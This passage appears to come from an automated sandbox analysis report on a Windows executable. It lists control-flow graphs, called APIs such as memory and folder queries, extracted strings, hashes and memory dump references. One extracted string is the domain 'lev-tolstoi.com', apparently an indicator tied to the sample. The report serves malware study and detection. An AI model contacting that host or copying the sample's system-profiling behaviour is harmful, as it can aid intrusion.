                                                                                                                                                                                                                                              control_flow_graph 532 40ac40-40ac6a 533 40ac70-40acbe 532->533 533->533 534 40acc0-40adc3 533->534 535 40add0-40adf5 534->535 535->535 536 40adf7-40ae0e 535->536 537 40ae10-40ae6c 536->537 537->537 538 40ae6e-40ae89 call 40bb90 537->538 540 40ae8e-40ae93 538->540 541 40afd7-40afd9 540->541 542 40ae99-40aeaa 540->542 543 40b186-40b192 541->543 544 40aeb0-40aecd 542->544 544->544 545 40aecf-40aed5 544->545 546 40aee0-40aeec 545->546 547 40aef3-40aef7 546->547 548 40aeee-40aef1 546->548 549 40b17d-40b183 call 43ab10 547->549 550 40aefd-40af1a 547->550 548->546 548->547 549->543 551 40af20-40af8a 550->551 551->551 553 40af8c-40af98 551->553 555 40af9a-40afa2 553->555 556 40afde-40afe2 553->556 557 40afb7-40afbc 555->557 558 40afe8-40b012 556->558 559 40b17b 556->559 557->559 560 40afc2-40afc9 557->560 561 40b020-40b057 558->561 559->549 562 40afcb-40afcd 560->562 563 40afcf 560->563 561->561 564 40b059-40b062 561->564 562->563 565 40afb0-40afb5 563->565 566 40afd1-40afd5 563->566 567 40b064-40b071 564->567 568 40b0a5-40b0a9 564->568 565->556 565->557 566->565 569 40b087-40b08c 567->569 570 40b142-40b147 568->570 571 40b0af-40b0c2 568->571 569->570 572 40b092-40b099 569->572 570->549 573 40b0d0-40b0fd 571->573 574 40b09b-40b09d 572->574 575 40b09f 572->575 573->573 576 40b0ff-40b10b 573->576 574->575 577 40b080-40b085 575->577 578 40b0a1-40b0a3 575->578 579 40b149-40b14b 576->579 580 40b10d-40b11b 576->580 577->568 577->569 578->577 581 40b158-40b179 call 40a970 579->581 582 40b127-40b12d 580->582 581->549 582->570 584 40b12f-40b136 582->584 586 40b138-40b13a 584->586 587 40b13c 584->587 586->587 588 40b120-40b125 587->588 589 40b13e-40b140 587->589 588->582 590 40b14d-40b156 588->590 589->588 590->559 590->581
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: QV"$ QV"$'>?0$QF$bfVT$muw
                                                                                                                                                                                                                                              • API String ID: 0-1773726041
                                                                                                                                                                                                                                              • Opcode ID: f183004b8afbaf8c4098fa454fb759349bd63669b9d4d61da270fec7344e7e53
                                                                                                                                                                                                                                              • Instruction ID: 2b09c4998ba2a0006662a38d3ccca405f63efca502306c7653717ec05fcb1026
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f183004b8afbaf8c4098fa454fb759349bd63669b9d4d61da270fec7344e7e53
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 67D1387664C3558BC320DF24885026BFBE2EBC5350F1C893DE8E55B381D779991A878B

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 591 4087a0-4087b1 call 43c090 594 408962-408964 ExitProcess 591->594 595 4087b7-4087be call 4352a0 591->595 598 4087c4-4087e5 GetCurrentProcessId GetCurrentThreadId 595->598 599 40895d call 43c6f0 595->599 600 4087e7-4087e9 598->600 601 4087eb-4087f0 598->601 599->594 603 4087f3-4087fe 600->603 601->603 604 408800 603->604 605 408802-408813 603->605 604->605 606 408815 605->606 607 408817-408822 605->607 606->607 608 408824 607->608 609 408826-408912 SHGetSpecialFolderPathW GetForegroundWindow 607->609 608->609 610 408914-408937 609->610 611 408939-408951 call 409c00 609->611 610->611 611->599 614 408953 call 40d000 611->614 616 408958 call 40bb60 614->616 616->599
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 004087C4
                                                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 004087CE
                                                                                                                                                                                                                                              • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 004088F5
                                                                                                                                                                                                                                              • GetForegroundWindow.USER32 ref: 0040890A
                                                                                                                                                                                                                                                • Part of subcall function 0040D000: CoInitializeEx.COMBASE(00000000,00000002), ref: 0040D013
                                                                                                                                                                                                                                                • Part of subcall function 0040BB60: FreeLibrary.KERNEL32(0040895D), ref: 0040BB66
                                                                                                                                                                                                                                                • Part of subcall function 0040BB60: FreeLibrary.KERNEL32 ref: 0040BB87
                                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00408964
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentFreeLibraryProcess$ExitFolderForegroundInitializePathSpecialThreadWindow
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3072701918-0
                                                                                                                                                                                                                                              • Opcode ID: 6adf2c4adff5663b792584f45a1ca5a280b2db619a45e652ac6a474fa48604cb
                                                                                                                                                                                                                                              • Instruction ID: 9a1bf80dafd23c1d70cb7e2d91139f0b708e74a3f09392a7315ff1b111803ca1
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6adf2c4adff5663b792584f45a1ca5a280b2db619a45e652ac6a474fa48604cb
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A541D17BE047184BC718BF54DC5532BB6959BC5304F09803EB9C5AB3C2EEB89C05828A

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 618 42d1a4-42d1c7 619 42d1d0-42d215 618->619 619->619 620 42d217-42d221 619->620 621 42d223-42d22a 620->621 622 42d23b-42d56f 620->622 623 42d230-42d239 621->623 625 42d570-42d5b2 622->625 623->622 623->623 625->625 626 42d5b4-42d5be 625->626 627 42d5c0-42d5ca 626->627 628 42d5dd 626->628 630 42d5d0-42d5d9 627->630 629 42d5e0-42d5ec 628->629 632 42d601-42d647 call 43e480 GetPhysicallyInstalledSystemMemory call 41fa90 629->632 633 42d5ee 629->633 630->630 631 42d5db 630->631 631->629 639 42d64c-42d665 632->639 634 42d5f0-42d5fd 633->634 634->634 636 42d5ff 634->636 636->632 640 42d670-42d697 639->640 640->640 641 42d699-42d6c9 640->641 642 42d6d0-42d6f6 641->642 642->642 643 42d6f8-42d702 642->643 644 42d704-42d70b 643->644 645 42d71b-42d723 643->645 646 42d710-42d719 644->646 647 42d725-42d726 645->647 648 42d73b-42d748 645->648 646->645 646->646 649 42d730-42d739 647->649 650 42d74a-42d751 648->650 651 42d76b-42d7bf 648->651 649->648 649->649 652 42d760-42d769 650->652 653 42d7c0-42d7e4 651->653 652->651 652->652 653->653 654 42d7e6-42d7f0 653->654 655 42d7f2-42d7f9 654->655 656 42d80b-42d818 654->656 657 42d800-42d809 655->657 658 42d81a-42d821 656->658 659 42d83b-42d8e0 656->659 657->656 657->657 660 42d830-42d839 658->660 660->659 660->660
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042D62C
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: InstalledMemoryPhysicallySystem
                                                                                                                                                                                                                                              • String ID: 5$CNd6${
                                                                                                                                                                                                                                              • API String ID: 3960555810-1601155441
                                                                                                                                                                                                                                              • Opcode ID: 1d6ee5fce619cc59d92231b303ad9e001e20aad935fc8eed8eb44ff96f82b468
                                                                                                                                                                                                                                              • Instruction ID: d3579ced008b1240718247bcc625fa3909845d2e02901f8e80a580c15fb3d2df
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1d6ee5fce619cc59d92231b303ad9e001e20aad935fc8eed8eb44ff96f82b468
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7DB1E13160C3918ED7298F2994603ABFBE1AFD3304F68496ED4D99B392C779440ACB57

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 661 417fb0-417ff7 662 418000-41802f 661->662 662->662 663 418031-418051 call 401dd0 662->663 666 418160-418173 call 401e10 663->666 667 4183d0-4183d4 663->667 668 418130-418139 call 407fb0 663->668 669 4183b5-4183c2 call 407fb0 663->669 670 418386-4183ad call 41dea0 663->670 671 418058-418086 663->671 672 418128-41812e 663->672 673 418338-418345 663->673 674 41834c-418359 663->674 675 41813c-418148 663->675 676 4183de 663->676 694 4181c0 666->694 695 418175-418178 666->695 667->676 668->675 669->667 670->669 677 418090-4180c7 671->677 681 418149-418159 call 401e00 672->681 673->667 673->668 673->669 673->670 673->674 673->675 679 418381 674->679 680 41835b-418362 674->680 675->681 678 4183e2-41a5c8 call 401f70 676->678 677->677 687 4180c9-418123 call 41dea0 677->687 679->670 689 418370-41837f 680->689 681->666 681->667 681->668 681->669 681->670 681->673 681->674 681->675 681->676 687->678 689->679 689->689 702 4181c2-4181ce 694->702 699 418189-418197 695->699 703 418180 699->703 704 418199-41819b 699->704 705 4181e0 702->705 706 4181d0-4181d5 702->706 707 418181-418187 703->707 704->703 708 41819d-4181a8 704->708 709 4181e7-418213 call 407fa0 call 40a970 705->709 706->709 707->699 707->702 708->703 710 4181aa-4181b3 708->710 716 418215-418217 709->716 717 41821e-418237 call 407fa0 709->717 710->707 712 4181b5-4181b8 710->712 712->707 716->717 720 418251-418268 717->720 721 418239-41823f 717->721 723 418270-4182c4 720->723 722 418240-41824f 721->722 722->720 722->722 723->723 724 4182c6-4182de 723->724 725 418310-418313 724->725 726 4182e0-4182ef 724->726 728 41831a-418324 call 43ee50 725->728 727 4182f0-4182ff 726->727 727->727 730 418301 727->730 731 418329-418331 728->731 730->728 731->667 731->668 731->669 731->670 731->673 731->674 731->675
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: G)I$"-.#$04-3$9'
                                                                                                                                                                                                                                              • API String ID: 0-991499
                                                                                                                                                                                                                                              • Opcode ID: fe207a812a7a7de0297151c35c74c3835ad873d896c309626031c5fa9e15daee
                                                                                                                                                                                                                                              • Instruction ID: 0bd526be77c85698cb9c24990b81f34b106bda5fa305ac09da14d4dbac32ab7c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fe207a812a7a7de0297151c35c74c3835ad873d896c309626031c5fa9e15daee
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8FB155729093119BDB218F15D8417EF77A1FF85328F09492EE8995B3A1E7389801CB96

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 732 40d072-40d087 733 40d090-40d0ab 732->733 733->733 734 40d0ad-40d0e1 call 408650 call 437dd0 733->734 739 40d0f0-40d128 734->739 739->739 740 40d12a-40d192 739->740 741 40d1a0-40d1cf 740->741 741->741 742 40d1d1-40d1e2 741->742 743 40d1e4-40d1eb 742->743 744 40d1fb-40d203 742->744 745 40d1f0-40d1f9 743->745 746 40d205-40d206 744->746 747 40d21b-40d228 744->747 745->744 745->745 748 40d210-40d219 746->748 749 40d22a-40d231 747->749 750 40d24b-40d253 747->750 748->747 748->748 751 40d240-40d249 749->751 752 40d255-40d256 750->752 753 40d26b-40d385 750->753 751->750 751->751 754 40d260-40d269 752->754 755 40d390-40d3ba 753->755 754->753 754->754 755->755 756 40d3bc-40d3df 755->756 757 40d3e0-40d3fa 756->757 757->757 758 40d3fc-40d426 call 40bb90 757->758 760 40d42b-40d446 758->760
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: 1CAF9CB3F3F835CB88B9F97B60ED618D$;<$lev-tolstoi.com$zAbC
                                                                                                                                                                                                                                              • API String ID: 0-3279647422
                                                                                                                                                                                                                                              • Opcode ID: f0ef59281c210f88dfb384b79dd03f3ddfdd7b1538eeefdad5af66cc8f071a69
                                                                                                                                                                                                                                              • Instruction ID: 118b889508cfe567c483e71ec93226a2c54febe15430ed9e2e4e8d84d284c7af
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f0ef59281c210f88dfb384b79dd03f3ddfdd7b1538eeefdad5af66cc8f071a69
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EC81CFB154D3D08BE335CF6198907DBBBE1ABDA314F184A6DC4C95B382C7394809CB9A

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 761 422ba0-422c01 call 43ec70 764 422c07-422c65 call 4156c0 call 43aae0 761->764 765 423388-423395 761->765 770 422c67-422c6a 764->770 771 422ca8-422cab 770->771 772 422c6c-422ca6 770->772 773 422cad-422cb3 771->773 772->770 774 422cb5-422cba 773->774 775 422cbf-422cd7 773->775 776 422d80-422d83 774->776 777 422cd9 775->777 778 422cde-422ce9 775->778 781 422d87-422d91 776->781 782 422d85 776->782 779 422d70-422d74 777->779 778->779 780 422cef-422d63 call 43c7a0 778->780 784 422d76-422d79 779->784 785 422d7e 779->785 789 422d68-422d6b 780->789 786 4232b3-4232dd call 43ab10 781->786 787 422d97-422dad 781->787 782->781 784->773 785->776 795 4232df-4232e2 786->795 790 422daf-422dd7 787->790 789->779 792 422dd9 790->792 793 422dde-422df4 790->793 796 422fbf-422fc3 792->796 794 422df6-422df9 793->794 797 422dfb-422e3c 794->797 798 422e3e-422e63 call 4233a0 794->798 799 423320-423323 795->799 800 4232e4-42331e 795->800 801 422fc5-422fc7 796->801 802 422fc9-422fe0 call 43aae0 796->802 797->794 798->796 815 422e69-422e90 798->815 804 423325-42332b 799->804 800->795 805 422ffb-423003 801->805 819 422fe2-422ff1 802->819 820 422ff6-422ff9 802->820 810 42332f-423341 804->810 811 42332d 804->811 807 423005 805->807 808 42300a-423027 805->808 813 423285-42328a 807->813 814 423029-42302c 808->814 817 423343 810->817 818 423345-42334b 810->818 816 423385 811->816 824 423292-423295 813->824 825 42328c-423290 813->825 821 423046-423070 814->821 822 42302e-423044 814->822 823 422e93-422e96 815->823 816->765 826 423379-42337c 817->826 827 42334f-423376 call 43c7a0 818->827 828 42334d 818->828 829 423299-42329e 819->829 820->805 832 423072-423075 821->832 822->814 833 422eb3-422ed7 call 4233a0 823->833 834 422e98-422eb1 823->834 835 423297 824->835 825->835 830 423383 826->830 831 42337e-423381 826->831 827->826 828->826 829->790 836 4232a4-4232a9 829->836 830->816 831->804 838 4230b3-4230b9 832->838 839 423077-4230b1 832->839 850 422ed9 833->850 851 422ede-422ef6 833->851 834->823 835->829 845 423396 836->845 846 4232af-4232b1 836->846 843 4230bb-4230c1 838->843 839->832 848 4230c3-4230c8 843->848 849 4230cd-4230e5 843->849 846->786 852 42318e-423191 848->852 853 4230e7 849->853 854 4230ec-4230f8 849->854 850->796 855 422efa-422fbd call 407fa0 call 415300 call 407fb0 851->855 856 422ef8 851->856 857 423193 852->857 858 423196-4231b3 852->858 859 42317e-423182 853->859 854->859 860 4230fe-423171 call 43c7a0 854->860 855->796 856->855 857->858 865 4231b5-4231b8 858->865 863 423184-423187 859->863 864 42318c 859->864 870 423176-423179 860->870 863->843 864->852 868 4231ba-423209 865->868 869 42320b-423218 865->869 868->865 872 42321a 869->872 873 42321c-423220 869->873 870->859 874 423257-42325b 872->874 875 423222-423229 873->875 876 423275-423277 874->876 877 42325d-423273 call 43ab10 874->877 879 42322b-423237 875->879 880 423239-423242 875->880 883 423279-42327c 876->883 877->883 879->875 884 423246-42324c 880->884 885 423244 880->885 883->813 889 42327e-423283 883->889 886 42324e-423255 884->886 885->886 886->874 889->829
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: !@$,$9
                                                                                                                                                                                                                                              • API String ID: 0-2502672698
                                                                                                                                                                                                                                              • Opcode ID: d24ad947cb6c57ba7ef3b289cc3ac2b30acf8d1541035a3cd50400cdc0c601ac
                                                                                                                                                                                                                                              • Instruction ID: bc6fc98c22da22f4ab922aed425ac3019ab779c79b6f8b9c4d1add30748bb457
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d24ad947cb6c57ba7ef3b289cc3ac2b30acf8d1541035a3cd50400cdc0c601ac
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D0323371E083648FDB00CF78D5413AEBBF1AB45324F5885AED895AB381C77C8A45CB5A
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(?,00000000), ref: 00409CA2
                                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(?,00000000), ref: 00409D82
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: LibraryLoad
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1029625771-0
                                                                                                                                                                                                                                              • Opcode ID: 56d2c7b48d7e5001a3ae768e98319e8d442f4ef1605532188a03b6d8a5809ff3
                                                                                                                                                                                                                                              • Instruction ID: 9b432d29faedb0fc16d266b21f82e57b2d28a7527b6aee5668727a15aa5185f3
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 56d2c7b48d7e5001a3ae768e98319e8d442f4ef1605532188a03b6d8a5809ff3
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C741E2B4E403409FDB149F78C9D6A9A3F71EB46324F5092ACD8502F3E6C635981ACBD6
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                                                              • String ID: @$L6E
                                                                                                                                                                                                                                              • API String ID: 2994545307-1202440179
                                                                                                                                                                                                                                              • Opcode ID: a23d7e9868f8a9cca9c12c4b1f97ccee45c9022efec959b3c474de0818ecdd2c
                                                                                                                                                                                                                                              • Instruction ID: c1ee7400262d1e0610de9b502be72d646b26d6e68564faa2d2008ea74ce73bb7
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a23d7e9868f8a9cca9c12c4b1f97ccee45c9022efec959b3c474de0818ecdd2c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4C51F875E102148BDB1CCF94DC927BEB772EB89308F28A16DC902B7395EB355C028798
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                                                              • String ID: JIJK
                                                                                                                                                                                                                                              • API String ID: 2994545307-1094643357
                                                                                                                                                                                                                                              • Opcode ID: aa87fa58789f5af3bc3fac2ead8abceba3d83f59d60b05f682cbc255520d899d
                                                                                                                                                                                                                                              • Instruction ID: a016a636cffca8e26528e362b3568a78d06246e9f426c2a17e905ca1ce6996d0
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: aa87fa58789f5af3bc3fac2ead8abceba3d83f59d60b05f682cbc255520d899d
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2BB1E0326083114FD718CE28C89196BB7E2EBC9314F19893DEA95C7391DB39DC56CB86
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • LdrInitializeThunk.NTDLL(0043EC4E,005C003F,0000002C,?,?,00000018,959697A8,00000000,?,?,?,?,00000000,00000000), ref: 0043C7CE
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                                                                                              • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                                                              • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: ]>|0
                                                                                                                                                                                                                                              • API String ID: 0-2475017903
                                                                                                                                                                                                                                              • Opcode ID: a0a3e2f73b0ec9be7104128bda448993da256bfd1e4169b57de57bf625efa6de
                                                                                                                                                                                                                                              • Instruction ID: 34453aeea89ece734cb8ee81d1a6d752af7937882e103a56bce32cc94b6496d5
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a0a3e2f73b0ec9be7104128bda448993da256bfd1e4169b57de57bf625efa6de
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E6D1DBB4145B44CFE321CF65C585B96BBE0FB41308F508A1DC1AA2BBA0D7B5B146CF95
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 254d2eed935ab114ea2af9fe2f318f2d143c8f135f1f0a7abeb4682b21d45e4c
                                                                                                                                                                                                                                              • Instruction ID: 137bac940e20bffea3374522f6f5df3c56ec510eb4529d0f041f24251b29cdd9
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 254d2eed935ab114ea2af9fe2f318f2d143c8f135f1f0a7abeb4682b21d45e4c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 47C16B79104B01CFD3248F24EC51B67B7F5FB8A315F11896CE4AA876A0D735E816CB58
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                                                                                              • Opcode ID: de9afe3ab7e4b950448f2c1a26033e3d12d572daf1fd13881ae32bc7aa9eabd4
                                                                                                                                                                                                                                              • Instruction ID: 18d0810c0b7b4d40b13a7c4516b2d64624e8a127dde9a1e538e905749aec6462
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: de9afe3ab7e4b950448f2c1a26033e3d12d572daf1fd13881ae32bc7aa9eabd4
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FF91F335A083019FC714DF28C880A6BB7E1EF99720F15993EE885973A1E734EC45C796
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                                                                                              • Opcode ID: 9ead48db058498347acb751522f1921f184dee1dbe5bcc703478af13c59f137e
                                                                                                                                                                                                                                              • Instruction ID: 187977e05fc41fd27ff6ba279ade2ed59036c0483c1d5fc33daca303c26171b1
